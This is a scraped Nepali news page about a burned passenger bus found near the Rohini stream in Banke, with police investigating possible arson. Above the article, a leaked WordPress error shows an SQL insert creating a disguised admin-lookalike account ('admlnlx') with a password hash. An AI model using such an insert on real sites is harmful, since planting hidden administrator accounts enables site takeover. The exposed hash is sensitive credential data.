WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BYMWADHeAX.rOjoFMj5./TAMCtBMu.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 22:21:59', '', 'admlnlx', 'admlnlx')
बाँके,पुस ११–
कोहलपुर नगरपालिकादेखि तीन किलोमिटर पूर्व रोहिणी खोला नजिकै एउटा यात्रुबाहक बस जलेको अवस्थामा फेला परेको छ ।
पूर्व–पश्चिम राजमार्ग अन्तर्गत बाँकेको रोहिणी खोला नजिकै ना ५ ख ३३२९ नम्बरको बस जलेर नष्ट भएको अवस्थामा आज बिहान फेला परेको इलाका प्रहरी कार्यालय कोहलपुरले जनाएको छ ।
आगलागी भएको बसमा बस चालक र यात्रु कोही पनि नभएकाले बसमा आगलागी भएको हो वा गरिएको हो भन्ने विषयमा प्रहरीबाट अनुसन्धान भइरहेको छ ।
बसको मालिक को हो भन्ने समेत पत्ता नलागेको कोहलपुर प्रहरीले जनाएको छ ।